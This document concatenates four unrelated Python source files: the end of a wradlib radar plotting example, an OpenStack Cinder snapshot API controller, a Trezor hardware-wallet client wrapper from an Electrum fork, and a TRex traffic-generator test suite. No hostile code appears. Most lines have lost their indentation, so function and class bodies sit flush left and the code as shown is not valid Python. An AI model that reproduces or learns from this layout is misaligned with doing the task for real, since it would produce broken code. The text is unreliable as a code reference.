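    # mip_formatter converts tick values given in metres to kilometres and
    # drops the leading zero for values with |x| < 1, e.g. 500 m is labelled '.5'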
# angle of *cut* through ppi and scan elev.
angle = 0.0
elev = 0.0
data = np.loadtxt(os.path.dirname(__file__) + '/' + 'data/polar_dBZ_tur.gz')
# we need to have meter here for the georef function inside mip
d1 = np.arange(data.shape[1], dtype=np.float) * 1000
d2 = np.arange(data.shape[0], dtype=np.float)
data = np.roll(data, (d2 >= angle).nonzero()[0][0], axis=0)
# calculate max intensity proj
xs, ys, mip1 = wradlib.util.maximum_intensity_projection(data, r=d1, az=d2, angle=angle, elev=elev)
xs, ys, mip2 = wradlib.util.maximum_intensity_projection(data, r=d1, az=d2, angle=90+angle, elev=elev)
# normal cg plot
cgax, caax, paax, pm = wradlib.vis.plot_cg_ppi(data, r=d1, az=d2, refrac=True)
cgax.set_xlim(-np.max(d1),np.max(d1))
cgax.set_ylim(-np.max(d1),np.max(d1))
caax.xaxis.set_major_formatter(FuncFormatter(mip_formatter))
caax.yaxis.set_major_formatter(FuncFormatter(mip_formatter))
caax.set_xlabel('x_range [km]')
caax.set_ylabel('y_range [km]')
# axes divider section
divider = make_axes_locatable(cgax)
axMipX = divider.append_axes("top", size=1.2, pad=0.1, sharex=cgax)
axMipY = divider.append_axes("right", size=1.2, pad=0.1, sharey=cgax)
# special handling for labels etc.
cgax.axis["right"].major_ticklabels.set_visible(False)
cgax.axis["top"].major_ticklabels.set_visible(False)
axMipX.xaxis.set_major_formatter(NullFormatter())
axMipX.yaxis.set_major_formatter(FuncFormatter(mip_formatter))
axMipX.yaxis.set_major_locator(MaxNLocator(5))
axMipY.yaxis.set_major_formatter(NullFormatter())
axMipY.xaxis.set_major_formatter(FuncFormatter(mip_formatter))
axMipY.xaxis.set_major_locator(MaxNLocator(5))
# plot max intensity proj
ma = np.ma.array(mip1, mask=np.isnan(mip1))
axMipX.pcolormesh(xs, ys, ma)
ma = np.ma.array(mip2, mask=np.isnan(mip2))
axMipY.pcolormesh(ys.T, xs.T, ma.T)
# set labels, limits etc
axMipX.set_xlim(-np.max(d1),np.max(d1))
axMipX.set_ylim(0, wradlib.georef.beam_height_n(d1[-2], elev))
axMipY.set_xlim(0, wradlib.georef.beam_height_n(d1[-2], elev))
axMipY.set_ylim(-np.max(d1),np.max(d1))
axMipX.set_ylabel('height [km]')
axMipY.set_xlabel('height [km]')
axMipX.grid(True)
axMipY.grid(True)
t = pl.gcf().suptitle('AxesDivider CG-MIP Example')
pl.show()
if __name__ == '__main__':
ex_plot_cg_ppi()
|
|
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The volumes snapshots api."""
import webob
from webob import exc
from cinder.api import common
from cinder.api.openstack import wsgi
from cinder.api.v1 import volumes
from cinder.api import xmlutil
from cinder import exception
from cinder.openstack.common import log as logging
from cinder.openstack.common import strutils
from cinder import utils
from cinder import volume
LOG = logging.getLogger(__name__)
def _translate_snapshot_detail_view(context, snapshot):
"""Maps keys for snapshots details view."""
d = _translate_snapshot_summary_view(context, snapshot)
# NOTE(gagupta): No additional data / lookups at the moment
return d
def _translate_snapshot_summary_view(context, snapshot):
"""Maps keys for snapshots summary view."""
d = {}
d['id'] = snapshot['id']
d['created_at'] = snapshot['created_at']
d['display_name'] = snapshot['display_name']
d['display_description'] = snapshot['display_description']
d['volume_id'] = snapshot['volume_id']
d['status'] = snapshot['status']
d['size'] = snapshot['volume_size']
if snapshot.get('snapshot_metadata'):
metadata = snapshot.get('snapshot_metadata')
d['metadata'] = dict((item['key'], item['value']) for item in metadata)
# avoid circular ref when vol is a Volume instance
elif snapshot.get('metadata') and isinstance(snapshot.get('metadata'),
dict):
d['metadata'] = snapshot['metadata']
else:
d['metadata'] = {}
return d
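# Shape of the summary view built above (one dict per snapshot):
#     {'id', 'created_at', 'display_name', 'display_description',
#      'volume_id', 'status', 'size', 'metadata'}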
def make_snapshot(elem):
elem.set('id')
elem.set('status')
elem.set('size')
elem.set('created_at')
elem.set('display_name')
elem.set('display_description')
elem.set('volume_id')
elem.append(common.MetadataTemplate())
class SnapshotTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('snapshot', selector='snapshot')
make_snapshot(root)
return xmlutil.MasterTemplate(root, 1)
class SnapshotsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('snapshots')
elem = xmlutil.SubTemplateElement(root, 'snapshot',
selector='snapshots')
make_snapshot(elem)
return xmlutil.MasterTemplate(root, 1)
class SnapshotsController(wsgi.Controller):
"""The Volumes API controller for the OpenStack API."""
def __init__(self, ext_mgr=None):
self.volume_api = volume.API()
self.ext_mgr = ext_mgr
super(SnapshotsController, self).__init__()
@wsgi.serializers(xml=SnapshotTemplate)
def show(self, req, id):
"""Return data about the given snapshot."""
context = req.environ['cinder.context']
try:
vol = self.volume_api.get_snapshot(context, id)
except exception.NotFound:
raise exc.HTTPNotFound()
return {'snapshot': _translate_snapshot_detail_view(context, vol)}
def delete(self, req, id):
"""Delete a snapshot."""
context = req.environ['cinder.context']
LOG.audit(_("Delete snapshot with id: %s"), id, context=context)
try:
snapshot = self.volume_api.get_snapshot(context, id)
self.volume_api.delete_snapshot(context, snapshot)
except exception.NotFound:
raise exc.HTTPNotFound()
return webob.Response(status_int=202)
@wsgi.serializers(xml=SnapshotsTemplate)
def index(self, req):
"""Returns a summary list of snapshots."""
return self._items(req, entity_maker=_translate_snapshot_summary_view)
@wsgi.serializers(xml=SnapshotsTemplate)
def detail(self, req):
"""Returns a detailed list of snapshots."""
return self._items(req, entity_maker=_translate_snapshot_detail_view)
def _items(self, req, entity_maker):
"""Returns a list of snapshots, transformed through entity_maker."""
context = req.environ['cinder.context']
        # pop out limit and offset, they are not search_opts
search_opts = req.GET.copy()
search_opts.pop('limit', None)
search_opts.pop('offset', None)
        # filter out invalid options
allowed_search_options = ('status', 'volume_id', 'display_name')
volumes.remove_invalid_options(context, search_opts,
allowed_search_options)
snapshots = self.volume_api.get_all_snapshots(context,
search_opts=search_opts)
limited_list = common.limited(snapshots, req)
res = [entity_maker(context, snapshot) for snapshot in limited_list]
return {'snapshots': res}
@wsgi.serializers(xml=SnapshotTemplate)
def create(self, req, body):
"""Creates a new snapshot."""
kwargs = {}
context = req.environ['cinder.context']
if not self.is_valid_body(body, 'snapshot'):
raise exc.HTTPUnprocessableEntity()
snapshot = body['snapshot']
kwargs['metadata'] = snapshot.get('metadata', None)
try:
volume_id = snapshot['volume_id']
except KeyError:
msg = _("'volume_id' must be specified")
raise exc.HTTPBadRequest(explanation=msg)
try:
volume = self.volume_api.get(context, volume_id)
except exception.NotFound:
raise exc.HTTPNotFound()
force = snapshot.get('force', False)
msg = _("Create snapshot from volume %s")
LOG.audit(msg, volume_id, context=context)
if not utils.is_valid_boolstr(force):
msg = _("Invalid value '%s' for force. ") % force
raise exception.InvalidParameterValue(err=msg)
if strutils.bool_from_string(force):
new_snapshot = self.volume_api.create_snapshot_force(
context,
volume,
snapshot.get('display_name'),
snapshot.get('display_description'),
**kwargs)
else:
new_snapshot = self.volume_api.create_snapshot(
context,
volume,
snapshot.get('display_name'),
snapshot.get('display_description'),
**kwargs)
retval = _translate_snapshot_detail_view(context, new_snapshot)
return {'snapshot': retval}
@wsgi.serializers(xml=SnapshotTemplate)
def update(self, req, id, body):
"""Update a snapshot."""
context = req.environ['cinder.context']
if not body:
raise exc.HTTPUnprocessableEntity()
if 'snapshot' not in body:
raise exc.HTTPUnprocessableEntity()
snapshot = body['snapshot']
update_dict = {}
valid_update_keys = (
'display_name',
'display_description',
)
for key in valid_update_keys:
if key in snapshot:
update_dict[key] = snapshot[key]
try:
snapshot = self.volume_api.get_snapshot(context, id)
self.volume_api.update_snapshot(context, snapshot, update_dict)
except exception.NotFound:
raise exc.HTTPNotFound()
snapshot.update(update_dict)
return {'snapshot': _translate_snapshot_detail_view(context, snapshot)}
def create_resource(ext_mgr):
return wsgi.Resource(SnapshotsController(ext_mgr))
|
|
import time
from struct import pack
from electrum import ecc
from electrum.i18n import _
from electrum.util import UserCancelled, UserFacingException
from electrum.keystore import bip39_normalize_passphrase
from electrum.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum.logging import Logger
from electrum.plugins.hw_wallet.plugin import OutdatedHwFirmwareException
from trezorlib.client import TrezorClient
from trezorlib.exceptions import TrezorFailure, Cancelled, OutdatedFirmwareError
from trezorlib.messages import WordRequestType, FailureType, RecoveryDeviceType
import trezorlib.btc
import trezorlib.device
MESSAGES = {
3: _("Confirm the transaction output on your {} device"),
4: _("Confirm internal entropy on your {} device to begin"),
5: _("Write down the seed word shown on your {}"),
6: _("Confirm on your {} that you want to wipe it clean"),
7: _("Confirm on your {} device the message to sign"),
8: _("Confirm the total amount spent and the transaction fee on your {} device"),
10: _("Confirm wallet address on your {} device"),
14: _("Choose on your {} device where to enter your passphrase"),
'default': _("Check your {} device to continue"),
}
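# The numeric keys above are the button-request codes passed to
# TrezorClientBase.button_request() below; unknown codes fall back to the
# 'default' message.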
class TrezorClientBase(Logger):
def __init__(self, transport, handler, plugin):
if plugin.is_outdated_fw_ignored():
TrezorClient.is_outdated = lambda *args, **kwargs: False
self.client = TrezorClient(transport, ui=self)
self.plugin = plugin
self.device = plugin.device
self.handler = handler
Logger.__init__(self)
self.msg = None
self.creating_wallet = False
self.in_flow = False
self.used()
def run_flow(self, message=None, creating_wallet=False):
if self.in_flow:
raise RuntimeError("Overlapping call to run_flow")
self.in_flow = True
self.msg = message
self.creating_wallet = creating_wallet
self.prevent_timeouts()
return self
def end_flow(self):
self.in_flow = False
self.msg = None
self.creating_wallet = False
self.handler.finished()
self.used()
def __enter__(self):
return self
def __exit__(self, exc_type, e, traceback):
self.end_flow()
if e is not None:
if isinstance(e, Cancelled):
raise UserCancelled from e
elif isinstance(e, TrezorFailure):
raise RuntimeError(str(e)) from e
elif isinstance(e, OutdatedFirmwareError):
raise OutdatedHwFirmwareException(e) from e
else:
return False
return True
@property
def features(self):
return self.client.features
def __str__(self):
return "%s/%s" % (self.label(), self.features.device_id)
def label(self):
'''The name given by the user to the device.'''
return self.features.label
def is_initialized(self):
'''True if initialized, False if wiped.'''
return self.features.initialized
def is_pairable(self):
return not self.features.bootloader_mode
def has_usable_connection_with_device(self):
if self.in_flow:
return True
try:
res = self.client.ping("electrum pinging device")
assert res == "electrum pinging device"
except BaseException:
return False
return True
def used(self):
self.last_operation = time.time()
def prevent_timeouts(self):
self.last_operation = float('inf')
def timeout(self, cutoff):
'''Time out the client if the last operation was before cutoff.'''
if self.last_operation < cutoff:
self.logger.info("timed out")
self.clear_session()
def i4b(self, x):
return pack('>I', x)
def get_xpub(self, bip32_path, xtype, creating=False):
address_n = parse_path(bip32_path)
with self.run_flow(creating_wallet=creating):
node = trezorlib.btc.get_public_node(self.client, address_n).node
return BIP32Node(xtype=xtype,
eckey=ecc.ECPubkey(node.public_key),
chaincode=node.chain_code,
depth=node.depth,
fingerprint=self.i4b(node.fingerprint),
child_number=self.i4b(node.child_num)).to_xpub()
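    # Illustrative call (path and xtype are assumed example values):
    #     xpub = client.get_xpub("m/49'/0'/0'", 'p2wpkh-p2sh')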
def toggle_passphrase(self):
if self.features.passphrase_protection:
msg = _("Confirm on your {} device to disable passphrases")
else:
msg = _("Confirm on your {} device to enable passphrases")
enabled = not self.features.passphrase_protection
with self.run_flow(msg):
trezorlib.device.apply_settings(self.client, use_passphrase=enabled)
def change_label(self, label):
with self.run_flow(_("Confirm the new label on your {} device")):
trezorlib.device.apply_settings(self.client, label=label)
def change_homescreen(self, homescreen):
with self.run_flow(_("Confirm on your {} device to change your home screen")):
trezorlib.device.apply_settings(self.client, homescreen=homescreen)
def set_pin(self, remove):
if remove:
msg = _("Confirm on your {} device to disable PIN protection")
elif self.features.pin_protection:
msg = _("Confirm on your {} device to change your PIN")
else:
msg = _("Confirm on your {} device to set a PIN")
with self.run_flow(msg):
trezorlib.device.change_pin(self.client, remove)
def clear_session(self):
'''Clear the session to force pin (and passphrase if enabled)
re-entry. Does not leak exceptions.'''
self.logger.info(f"clear session: {self}")
self.prevent_timeouts()
try:
self.client.clear_session()
except BaseException as e:
# If the device was removed it has the same effect...
self.logger.info(f"clear_session: ignoring error {e}")
def close(self):
        '''Called when our wallet was closed or the device removed.'''
self.logger.info("closing client")
self.clear_session()
def is_uptodate(self):
if self.client.is_outdated():
return False
return self.client.version >= self.plugin.minimum_firmware
def get_trezor_model(self):
"""Returns '1' for Trezor One, 'T' for Trezor T."""
return self.features.model
def show_address(self, address_str, script_type, multisig=None):
coin_name = self.plugin.get_coin_name()
address_n = parse_path(address_str)
with self.run_flow():
return trezorlib.btc.get_address(
self.client,
coin_name,
address_n,
show_display=True,
script_type=script_type,
multisig=multisig)
def sign_message(self, address_str, message):
coin_name = self.plugin.get_coin_name()
address_n = parse_path(address_str)
with self.run_flow():
return trezorlib.btc.sign_message(
self.client,
coin_name,
address_n,
message)
def recover_device(self, recovery_type, *args, **kwargs):
input_callback = self.mnemonic_callback(recovery_type)
with self.run_flow():
return trezorlib.device.recover(
self.client,
*args,
input_callback=input_callback,
type=recovery_type,
**kwargs)
# ========= Unmodified trezorlib methods =========
def sign_tx(self, *args, **kwargs):
with self.run_flow():
return trezorlib.btc.sign_tx(self.client, *args, **kwargs)
def reset_device(self, *args, **kwargs):
with self.run_flow():
return trezorlib.device.reset(self.client, *args, **kwargs)
def wipe_device(self, *args, **kwargs):
with self.run_flow():
return trezorlib.device.wipe(self.client, *args, **kwargs)
# ========= UI methods ==========
def button_request(self, code):
message = self.msg or MESSAGES.get(code) or MESSAGES['default']
self.handler.show_message(message.format(self.device), self.client.cancel)
def get_pin(self, code=None):
if code == 2:
msg = _("Enter a new PIN for your {}:")
elif code == 3:
msg = (_("Re-enter the new PIN for your {}.\n\n"
"NOTE: the positions of the numbers have changed!"))
else:
msg = _("Enter your current {} PIN:")
pin = self.handler.get_pin(msg.format(self.device))
if not pin:
raise Cancelled
if len(pin) > 9:
self.handler.show_error(_('The PIN cannot be longer than 9 characters.'))
raise Cancelled
return pin
def get_passphrase(self):
if self.creating_wallet:
msg = _("Enter a passphrase to generate this wallet. Each time "
"you use this wallet your {} will prompt you for the "
"passphrase. If you forget the passphrase you cannot "
"access the fujicoins in the wallet.").format(self.device)
else:
msg = _("Enter the passphrase to unlock this wallet:")
passphrase = self.handler.get_passphrase(msg, self.creating_wallet)
if passphrase is None:
raise Cancelled
passphrase = bip39_normalize_passphrase(passphrase)
length = len(passphrase)
if length > 50:
self.handler.show_error(_("Too long passphrase ({} > 50 chars).").format(length))
raise Cancelled
return passphrase
def _matrix_char(self, matrix_type):
num = 9 if matrix_type == WordRequestType.Matrix9 else 6
char = self.handler.get_matrix(num)
if char == 'x':
raise Cancelled
return char
def mnemonic_callback(self, recovery_type):
if recovery_type is None:
return None
if recovery_type == RecoveryDeviceType.Matrix:
return self._matrix_char
step = 0
def word_callback(_ignored):
nonlocal step
step += 1
msg = _("Step {}/24. Enter seed word as explained on your {}:").format(step, self.device)
word = self.handler.get_word(msg)
if not word:
raise Cancelled
return word
return word_callback
|
|
#!/router/bin/python
from .stl_general_test import CStlGeneral_Test, CTRexScenario
from trex_stl_lib.api import *
import os, sys
import glob
from nose.tools import nottest
def get_error_in_percentage (golden, value):
    if golden == 0:
        return 0.0
return abs(golden - value) / float(golden)
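# NOTE: despite its name this returns a fraction, e.g. 0.05 for a 5% error;
# callers below compare the result against 0.05.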
def get_stl_profiles ():
profiles_path = os.path.join(CTRexScenario.scripts_path, 'stl/')
py_profiles = glob.glob(profiles_path + "/*.py")
yaml_profiles = glob.glob(profiles_path + "yaml/*.yaml")
return py_profiles + yaml_profiles
class STLClient_Test(CStlGeneral_Test):
"""Tests for stateless client"""
def setUp(self):
CStlGeneral_Test.setUp(self)
self.weak = self.is_virt_nics or CTRexScenario.setup_name in ('trex21', 'trex22')
if self.weak:
self.percentage = 5
self.pps = 500
else:
self.percentage = 50
self.pps = 50000
# strict mode is only for 'wire only' connection
if self.is_loopback and not self.weak:
self.strict = True
else:
self.strict = False
assert 'bi' in CTRexScenario.stl_ports_map
self.c = CTRexScenario.stl_trex
self.tx_port, self.rx_port = CTRexScenario.stl_ports_map['bi'][0]
self.c.connect()
self.c.reset(ports = [self.tx_port, self.rx_port])
port_info = self.c.get_port_info(ports = self.rx_port)[0]
drv_name = port_info['driver']
self.drv_name = drv_name
# due to defect trex-325
#if self.drv_name == 'net_mlx5':
# print("WARNING disable strict due to trex-325 on mlx5")
# self.strict = False
self.pkt = STLPktBuilder(pkt = Ether()/IP(src="16.0.0.1",dst="48.0.0.1")/UDP(dport=12,sport=1025)/IP()/'a_payload_example')
self.profiles = get_stl_profiles()
self.c.clear_stats()
def cleanup (self):
self.c.remove_all_captures()
self.c.reset(ports = [self.tx_port, self.rx_port])
@classmethod
def tearDownClass(cls):
if CTRexScenario.stl_init_error:
return
# connect back at end of tests
if not cls.is_connected():
CTRexScenario.stl_trex.connect()
def verify (self, expected, got):
if self.strict:
assert expected == got
else:
            if expected == 0:
                return
            else:
                if get_error_in_percentage(expected, got) < 0.05:
                    return
                print(' ERROR verify expected: %d got: %d ' % (expected, got))
                assert 0
def test_basic_connect_disconnect (self):
try:
self.c.connect()
assert self.c.is_connected(), 'client should be connected'
self.c.disconnect()
assert not self.c.is_connected(), 'client should be disconnected'
except STLError as e:
assert False , '{0}'.format(e)
def test_basic_single_burst (self):
try:
b1 = STLStream(name = 'burst',
packet = self.pkt,
mode = STLTXSingleBurst(total_pkts = 100,
percentage = self.percentage)
)
for i in range(0, 5):
self.c.add_streams([b1], ports = [self.tx_port, self.rx_port])
self.c.clear_stats()
self.c.start(ports = [self.tx_port, self.rx_port])
self.c.wait_on_traffic(ports = [self.tx_port, self.rx_port])
stats = self.c.get_stats()
assert self.tx_port in stats
assert self.rx_port in stats
self.verify(100, stats[self.tx_port]['opackets'])
self.verify(100, stats[self.rx_port]['ipackets'])
self.verify(100, stats[self.rx_port]['opackets'])
self.verify(100, stats[self.tx_port]['ipackets'])
self.c.remove_all_streams(ports = [self.tx_port, self.rx_port])
except STLError as e:
assert False , '{0}'.format(e)
#
def test_basic_multi_burst (self):
try:
b1 = STLStream(name = 'burst',
packet = self.pkt,
mode = STLTXMultiBurst(pkts_per_burst = 10,
count = 20,
percentage = self.percentage)
)
for i in range(0, 5):
self.c.add_streams([b1], ports = [self.tx_port, self.rx_port])
self.c.clear_stats()
self.c.start(ports = [self.tx_port, self.rx_port])
self.c.wait_on_traffic(ports = [self.tx_port, self.rx_port])
stats = self.c.get_stats()
assert self.tx_port in stats
assert self.rx_port in stats
self.verify(200, stats[self.tx_port]['opackets'])
self.verify(200, stats[self.rx_port]['ipackets'])
self.verify(200, stats[self.rx_port]['opackets'])
self.verify(200, stats[self.tx_port]['ipackets'])
self.c.remove_all_streams(ports = [self.tx_port, self.rx_port])
except STLError as e:
assert False , '{0}'.format(e)
#
def test_basic_cont (self):
pps = self.pps
duration = 0.1
golden = pps * duration
try:
b1 = STLStream(name = 'burst',
packet = self.pkt,
mode = STLTXCont(pps = pps)
)
for i in range(0, 5):
self.c.add_streams([b1], ports = [self.tx_port, self.rx_port])
self.c.clear_stats()
self.c.start(ports = [self.tx_port, self.rx_port], duration = duration)
assert self.c.ports[self.tx_port].is_transmitting(), 'port should be active'
assert self.c.ports[self.rx_port].is_transmitting(), 'port should be active'
self.c.wait_on_traffic(ports = [self.tx_port, self.rx_port])
stats = self.c.get_stats()
assert self.tx_port in stats, 'tx port not in stats'
assert self.rx_port in stats, 'rx port not in stats'
                # cont. with duration should be quite precise - 5% error is relaxed enough
check_params = (
stats[self.tx_port]['opackets'],
stats[self.rx_port]['opackets'],
stats[self.tx_port]['ipackets'],
stats[self.rx_port]['ipackets'],
)
for param in check_params:
assert get_error_in_percentage(golden, param) < 0.05, 'golden: %s, got: %s' % (golden, param)
self.c.remove_all_streams(ports = [self.tx_port, self.rx_port])
except STLError as e:
assert False , '{0}'.format(e)
def test_stress_connect_disconnect (self):
try:
for i in range(0, 100):
self.c.connect()
assert self.c.is_connected(), 'client should be connected'
self.c.disconnect()
assert not self.c.is_connected(), 'client should be disconnected'
except STLError as e:
assert False , '{0}'.format(e)
def pause_resume_update_streams_iteration(self, delay, expected_pps):
self.c.clear_stats(clear_flow_stats = False, clear_latency_stats = False, clear_xstats = False)
time.sleep(delay)
tx_pps = self.c.get_stats(ports = [0])[0]['opackets'] / delay
assert (expected_pps * 0.9 < tx_pps < expected_pps * 1.1), 'expected TX ~%spps, got: %s' % (expected_pps, tx_pps)
def test_pause_resume_update_streams(self):
self.c.reset()
s1 = STLStream(mode = STLTXSingleBurst(pps = 100, total_pkts = 9999))
s2 = STLStream(mode = STLTXCont(pps = 100))
s3 = STLStream(mode = STLTXCont(pps = 100))
s4 = STLStream(mode = STLTXCont(pps = 100), flow_stats = STLFlowLatencyStats(pg_id = 1))
s1_id, s2_id, s3_id, s4_id = self.c.add_streams([s1, s2, s3, s4], ports = [0])
self.c.start(ports = [0])
with self.assertRaises(STLError): # burst present => error
self.c.pause_streams(port = 0, stream_ids = [s3_id])
with self.assertRaises(STLError): # several ports => error
self.c.pause_streams(port = [0, 1], stream_ids = [s3_id])
self.c.stop(ports = [0])
self.c.remove_streams([s1_id], ports = [0]) # get rid of burst
self.c.start(ports = [0])
self.c.update_streams(port = 0, mult = '10kpps', stream_ids = [s3_id, s4_id]) # latency is not affected
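        # expected rate is now 10200 pps: s2 (100) + s3 (10000) + s4 (100,
        # the latency stream keeps its original rate)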
self.pause_resume_update_streams_iteration(delay = 5, expected_pps = 10200)
self.c.update_streams(port = 0, mult = '100pps', stream_ids = [s3_id])
self.c.pause_streams(port = 0, stream_ids = [s3_id])
self.pause_resume_update_streams_iteration(delay = 5, expected_pps = 200) # paused stream not transmitting
self.c.resume_streams(port = 0, stream_ids = [s3_id])
self.pause_resume_update_streams_iteration(delay = 5, expected_pps = 300) # resume the paused
def test_stress_tx (self):
try:
s1 = STLStream(name = 'stress',
packet = self.pkt,
mode = STLTXCont(percentage = self.percentage))
# add both streams to ports
self.c.add_streams([s1], ports = [self.tx_port, self.rx_port])
for i in range(0, 100):
self.c.start(ports = [self.tx_port, self.rx_port])
assert self.c.ports[self.tx_port].is_transmitting(), 'port should be active'
assert self.c.ports[self.rx_port].is_transmitting(), 'port should be active'
self.c.pause(ports = [self.tx_port, self.rx_port])
assert self.c.ports[self.tx_port].is_paused(), 'port should be paused'
assert self.c.ports[self.rx_port].is_paused(), 'port should be paused'
self.c.resume(ports = [self.tx_port, self.rx_port])
assert self.c.ports[self.tx_port].is_transmitting(), 'port should be active'
assert self.c.ports[self.rx_port].is_transmitting(), 'port should be active'
self.c.stop(ports = [self.tx_port, self.rx_port])
assert not self.c.ports[self.tx_port].is_active(), 'port should be idle'
assert not self.c.ports[self.rx_port].is_active(), 'port should be idle'
except STLError as e:
assert False , '{0}'.format(e)
def test_all_profiles (self):
        # Workaround for trex-405. Remove when it is resolved
if self.drv_name == 'net_mlx5' and 'VM' in self.modes:
self.skip('Can not run on mlx VM currently - see trex-405 for details')
if self.is_virt_nics or not self.is_loopback:
self.skip('skipping profile tests for virtual / non loopback')
return
default_mult = self.get_benchmark_param('mult',default="30%")
skip_tests_per_setup = self.get_benchmark_param('skip',default=[])
skip_tests_global = ['imix_wlc.py']
try:
for profile in self.profiles:
print('\nProfile: %s' % profile[len(CTRexScenario.scripts_path):]);
skip = False
for skip_test in skip_tests_per_setup:
if skip_test in profile:
skip = True
break
if skip:
print(' * Skip due to config file...')
continue
for skip_test in skip_tests_global:
if skip_test in profile:
skip = True
break
if skip:
print(' * Skip due to global ignore of this profile...')
continue
p1 = STLProfile.load(profile, port_id = self.tx_port)
p2 = STLProfile.load(profile, port_id = self.rx_port)
# if profile contains custom MAC addrs we need promiscuous mode
# but virtual NICs does not support promiscuous mode
self.c.set_port_attr(ports = [self.tx_port, self.rx_port], promiscuous = False)
if p1.has_custom_mac_addr() or p2.has_custom_mac_addr():
if self.is_virt_nics:
print(" * Skip due to Virtual NICs and promiscuous mode requirement...")
continue
elif self.is_vf_nics:
print(" * Skip due to VF NICs and promiscuous mode requirement...")
continue
else:
self.c.set_port_attr(ports = [self.tx_port, self.rx_port], promiscuous = True)
if p1.has_flow_stats() or p2.has_flow_stats():
print(" * Skip due to RX caps requirement")
continue
self.c.add_streams(p1, ports = self.tx_port)
self.c.add_streams(p2, ports = self.rx_port)
self.c.clear_stats()
self.c.start(ports = [self.tx_port, self.rx_port], mult = default_mult)
time.sleep(0.1)
if p1.is_pauseable() and p2.is_pauseable():
self.c.pause(ports = [self.tx_port, self.rx_port])
time.sleep(0.1)
self.c.resume(ports = [self.tx_port, self.rx_port])
time.sleep(0.1)
self.c.stop(ports = [self.tx_port, self.rx_port])
stats = self.c.get_stats()
assert self.tx_port in stats, '{0} - no stats for TX port'.format(profile)
assert self.rx_port in stats, '{0} - no stats for RX port'.format(profile)
self.verify(stats[self.tx_port]['opackets'], stats[self.rx_port]['ipackets'])
self.verify(stats[self.rx_port]['opackets'], stats[self.tx_port]['ipackets'])
self.c.remove_all_streams(ports = [self.tx_port, self.rx_port])
except STLError as e:
assert False , '{0}'.format(e)
finally:
self.c.set_port_attr(ports = [self.tx_port, self.rx_port], promiscuous = False)
# see https://trex-tgn.cisco.com/youtrack/issue/trex-226
def test_latency_pause_resume (self):
try:
s1 = STLStream(name = 'latency',
packet = self.pkt,
mode = STLTXCont(percentage = self.percentage),
flow_stats = STLFlowLatencyStats(pg_id = 1))
self.c.add_streams([s1], ports = self.tx_port)
self.c.clear_stats()
self.c.start(ports = self.tx_port)
for i in range(100):
self.c.pause()
self.c.resume()
self.c.stop()
except STLError as e:
assert False , '{0}'.format(e)
def test_pcap_remote (self):
try:
pcap_file = os.path.join(CTRexScenario.scripts_path, 'automation/regression/test_pcaps/pcap_dual_test.erf')
master = self.tx_port
slave = master ^ 0x1
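            # dual-mode push uses the adjacent port as the slave, i.e. the
            # master port number with its lowest bit flipped (0<->1, 2<->3, ...)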
self.c.reset(ports = [master, slave])
self.c.clear_stats()
self.c.push_remote(pcap_file,
ports = [master],
ipg_usec = 100,
is_dual = True)
self.c.wait_on_traffic(ports = [master])
stats = self.c.get_stats()
self.verify(52, stats[master]['opackets'])
self.verify(48, stats[slave]['opackets'])
except STLError as e:
assert False , '{0}'.format(e)
def test_tx_from_rx (self):
'''
test TX packets from the RX core
'''
tx_capture_id = None
rx_capture_id = None
        # use explicit values for easy comparison
tx_src_mac = self.c.ports[self.tx_port].get_layer_cfg()['ether']['src']
tx_dst_mac = self.c.ports[self.tx_port].get_layer_cfg()['ether']['dst']
try:
# add some background traffic (TCP)
s1 = STLStream(name = 'burst', packet = STLPktBuilder(Ether()/IP()/TCP()), mode = STLTXCont())
self.c.add_streams(ports = [self.tx_port, self.rx_port], streams = [s1])
self.c.start(ports = [self.tx_port, self.rx_port], mult = "5kpps")
self.c.set_service_mode(ports = [self.tx_port, self.rx_port])
# VICs adds VLAN 0 on RX side
tx_capture_id = self.c.start_capture(tx_ports = self.tx_port, bpf_filter = 'udp')['id']
rx_capture_id = self.c.start_capture(rx_ports = self.rx_port, bpf_filter = 'udp or (vlan and udp)')['id']
pkts = [bytes(Ether(src=tx_src_mac,dst=tx_dst_mac)/IP()/UDP(sport = x,dport=1000)/('x' * 100)) for x in range(50000,50500)]
self.c.push_packets(pkts, ports = self.tx_port, ipg_usec = 1e6 / self.pps)
# check capture status with timeout
timeout = PassiveTimer(2)
while not timeout.has_expired():
caps = self.c.get_capture_status()
assert(len(caps) == 2)
if (caps[tx_capture_id]['count'] == len(pkts)) and (caps[rx_capture_id]['count'] == len(pkts)):
break
time.sleep(0.1)
assert(caps[tx_capture_id]['count'] == len(pkts))
self.verify(len(pkts), caps[rx_capture_id]['count'])
# TX capture
tx_pkts = []
self.c.stop_capture(tx_capture_id, output = tx_pkts)
tx_capture_id = None
# RX capture
rx_pkts = []
self.c.stop_capture(rx_capture_id, output = rx_pkts)
rx_capture_id = None
tx_pkts = [x['binary'] for x in tx_pkts]
rx_pkts = [x['binary'] for x in rx_pkts]
# TX pkts should be the same
assert(set(pkts) == set(tx_pkts))
            # RX pkts are not byte-identical - loose check: all arrived and all are UDP
self.verify(len(pkts), len(rx_pkts))
assert (all(['UDP' in Ether(x) for x in rx_pkts]))
except STLError as e:
# cleanup if needed
if tx_capture_id:
self.c.stop_capture(tx_capture_id)
if rx_capture_id:
self.c.stop_capture(rx_capture_id)
assert False , '{0}'.format(e)
finally:
self.cleanup()
def test_bpf (self):
'''
test BPF filters
'''
tx_capture_id = None
rx_capture_id = None
        # use explicit values for easy comparison
tx_src_mac = self.c.ports[self.tx_port].get_layer_cfg()['ether']['src']
tx_dst_mac = self.c.ports[self.tx_port].get_layer_cfg()['ether']['dst']
try:
self.c.set_service_mode(ports = [self.tx_port, self.rx_port])
# VICs adds VLAN 0 tagging
bpf_filter = "udp and src portrange 1-250"
bpf_filter = '{0} or (vlan and {1})'.format(bpf_filter, bpf_filter)
tx_capture_id = self.c.start_capture(tx_ports = self.tx_port, bpf_filter = bpf_filter)['id']
rx_capture_id = self.c.start_capture(rx_ports = self.rx_port, bpf_filter = bpf_filter)['id']
